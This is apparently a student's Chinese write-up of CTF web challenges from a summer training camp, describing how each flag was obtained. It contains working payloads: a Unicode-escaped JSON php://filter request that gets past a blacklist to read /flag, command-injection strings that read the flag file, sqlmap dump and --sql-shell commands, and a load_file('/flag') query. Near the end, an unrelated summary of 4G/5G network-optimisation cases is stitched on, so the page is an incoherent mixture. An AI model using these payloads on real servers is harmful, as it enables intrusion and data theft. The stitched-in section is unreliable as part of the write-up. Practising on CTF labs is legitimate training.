暑假集训所录-第一周web

rce_me

首先分析源码

<?php error_reporting(0); highlight_file(FILE); function is_safe($input) { $blacklist = [ '\.\.', //防止目录穿越 '(php|file|glob|data|tp|zip|zlib|phar):', 'flag' //过滤常见的伪协议和flag关键字眼 ]; $pattern = '/' . implode('|', $blacklist) . '/i'; //生成正则 return !preg_match($pattern, $input); //匹配正则 } $requestBody = file_get_contents('php://input'); //利用php://input协议获取post数据 $parsedJson = json_decode($requestBody, true); // 变量requestbody进行json解码后赋值给变量parsejson if (is_safe($requestBody) && isset($parsedJson) && isset($parsedJson['pages'])) { //

 

对requestbody内容进行黑名单检测、检测parsejson中是否存在page参数 -> 意味着我们的payload应传递给pages参数

$pageUrl = $parsedJson['pages']; $pageContent = file_get_contents($pageUrl); //

 

读取pageurl中文件的内容并赋值给pagecontent -> 到这里就可以确定是一个文件包含漏洞了

if (!$pageContent || !is_safe($pageContent)) { //对pagecontent内容进行检测 $pageContent = "<p>not found</p>\n"; } } else { $pageContent = '<p>invalid request</p>'; } $pageContent = preg_replace('/flag\{.+\}/i', 'flag{123}', $pageContent); echo json_encode(['content' => $pageContent]); ?>

//

 

//最后这里如果直接返回明文Flag则会替换掉Flag中的内容 -> 这里很明显需要对返回的内容进行加密,不难想到利用php://filter中的流控制器进行数据编码

在阅读完整个代码后,可以大致猜测到本题是需要利用php://filter伪协议来读取文件的,难点在于绕过is_valid()这一检测函数,于是引出了json编码数据中的一个小Trick,即\uxxxx可以在json中转移字符,如\u等效于\u0041

也就是说我们可以将is_safe()中ban掉的关键词利用16进制的Unicode编码进行转义,从而实现绕过检测,所以首先构造可以读取文件/flag内容的payload

php://filter/convert.base64-encode/resource=/flag

编码\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067

构造json数据包

{"pages":"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067"}

将json数据包利用post方式发送,得到解码base64

Sinple-php

本题主要有两个关键点

1:$parsedJson = json_decode($requestBody, true); 传参格式 {"名":"值"}

2: 正则绕过 1:使用命令拼接 2:通配符 3:过滤了点号

payload1为{"cmd":"a=ca&&b=t&&$a$b /[e-h][k-m][0-b][e-h][+-0]txt"}

这里还测试过以下payload也能出

payload2:{"cmd":"c=Y2F0IC9mbGFn&&d=LnR4dA==&&a=bas&&b=h&&echo $c$d|base64 -d|$a$b"}

payload3:

f=l&&g=s&&h=he&&i=ad&&j=txt&&a=ca&&b=t&&c=fla&&d=g&&e=$($f$g -a|$h$i -n 1)&&$a$b /$c$d$e$j

payload比较简单,就不仔细解释了

simple_php_revenge

这题多ban了一个东西,但也没有影响上题的payload,估计是解法非预期

人才(做的)管理系统 by hacked_1

首先的思路是直接爆,但先进行一下信息收集,查看源代码,结果发现这么一段代码

就是说我们登入成功后会出现index.html这么个东西,所以我们直接先访问它,结果出现了flag

人才(做的)管理系统 by hacked_2

本题提示flag是在数据库里

本题注入点为登录界面(这里我们找了挺久,最后是请教了出题人才知道,记录一下注入点也是能够在登录界面的,因为在其他地方也没找到)本题是使用sqlmap解的

知道注入点后先随便写账号密码登入,然后抓包

可以看到请求方法为POST

所以目标使用-r命令(BP抓包放到一个文档里)

sqlmap -r '/home/kali/桌面/1.txt' --dbs(这里新建了一个1.txt,拖入即可)查数据库

这里查到4个,猜测staff库比较可疑,所以先查staff库下的表

sqlmap -r "/home/kali/桌面/1.txt" -D staff --tables

可以看到有7个表,flag很有可能就在flag表里,所以接下来查表flag里的列

sqlmap -r '/home/kali/桌面/1.txt' -D staff -T flag --dump

查到有两个列,且其中一个为flag,所以基本可以确定flag就在flag列里面,接着查flag列下的flag值

sqlmap -r '/home/kali/桌面/1.txt' -D staff -T flag -C "flag" --dump

人才(做的)管理系统 by hacked_3

本题提示flag在根目录下,本来想继续用上题解法,但爆出来的库和表太多了,查了好一会也没什么发现,并且本题提示为flag在根目录下,仔细一想也并不知道爆出来的那些库,表什么的会与根目录有什么关系。经过别的师傅提示说可以用--sql-shell,了解到

--sql-shell: 是 SQLMap 的一个选项,指示在成功利用 SQL 注入漏洞后打开一个交互式的 SQL shell。这个 SQL shell 允许用户直接与目标数据库进行交互,执行 SQL 查询和命令,从而获取数据或者控制数据库。也就是说可以利用他来执行命令

所以可以执行该命令 sqlmap -r '/home/plb/Desktop/1.txt' --sql-shell

但是执行完了又该如何查看根目录下的flag呢,了解到:

load_file('/flag'): 这是一个 MySQL 特定的函数 load_file(),它的作用是从文件系统中读取指定路径的文件内容并返回。在这个例子中,'/flag' 是一个文件路径,表示尝试读取名为 flag 的文件内容。

所以执行select load_file('/flag')

以下是对提供的参考资料的总结,按照要求结构化多个要点分条输出: 4G/5G无线网络优化与网规案例分析: NSA站点下终端掉4G问题:部分用户反馈NSA终端频繁掉4G,主要因终端主动发起SCGfail导致。分析显示,在信号较好的环境下,终端可能因节能、过热保护等原因主动释放连接。解决方案建议终端侧进行分析处理,尝试关闭节电开关等。 RSSI算法识别天馈遮挡:通过计算RSSI平均值及差值识别天馈遮挡,差值大于3dB则认定有遮挡。不同设备分组规则不同,如64T和32T。此方法可有效帮助现场人员识别因环境变化引起的网络问题。 5G 160M组网小区CA不生效:某5G站点开启100M+60M CA功能后,测试发现UE无法正常使用CA功能。问题原因在于CA频点集标识配置错误,修正后测试正常。 5G网络优化与策略: CCE映射方式优化:针对诺基亚站点覆盖农村区域,通过优化CCE资源映射方式(交织、非交织),提升RRC连接建立成功率和无线接通率。非交织方式相比交织方式有显著提升。 5G AAU两扇区组网:与三扇区组网相比,AAU两扇区组网在RSRP、SINR、下载速率和上传速率上表现不同,需根据具体场景选择适合的组网方式。 5G语音解决方案:包括沿用4G语音解决方案、EPS Fallback方案和VoNR方案。不同方案适用于不同的5G组网策略,如NSA和SA,并影响语音连续性和网络覆盖。 4G网络优化与资源利用: 4G室分设备利旧:面对4G网络投资压减与资源需求矛盾,提出利旧多维度调优策略,包括资源整合、统筹调配既有资源,以满足新增需求和提质增效。 宏站RRU设备1托N射灯:针对5G深度覆盖需求,研究使用宏站AAU结合1托N射灯方案,快速便捷地开通5G站点,提升深度覆盖能力。 基站与流程管理: 爱立信LTE基站邻区添加流程:未提供具体内容,但通常涉及邻区规划、参数配置、测试验证等步骤,以确保基站间顺畅切换和覆盖连续性。 网络规划与策略: 新高铁跨海大桥覆盖方案试点:虽未提供详细内容,但可推测涉及高铁跨海大桥区域的4G/5G网络覆盖规划,需考虑信号穿透、移动性管理、网络容量等因素。 总结: 提供的参考资料涵盖了4G/5G无线网络优化、网规案例分析、网络优化策略、资源利用、基站管理等多个方面。 通过具体案例分析,展示了无线网络优化中的常见问题及解决方案,如NSA终端掉4G、RSSI识别天馈遮挡、CA不生效等。 强调了5G网络优化与策略的重要性,包括CCE映射方式优化、5G语音解决方案、AAU扇区组网选择等。 提出了4G网络优化与资源利用的策略,如室分设备利旧、宏站RRU设备1托N射灯等。 基站与流程管理方面,提到了爱立信LTE基站邻区添加流程,但未给出具体细节。 新高铁跨海大桥覆盖方案试点展示了特殊场景下的网络规划需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值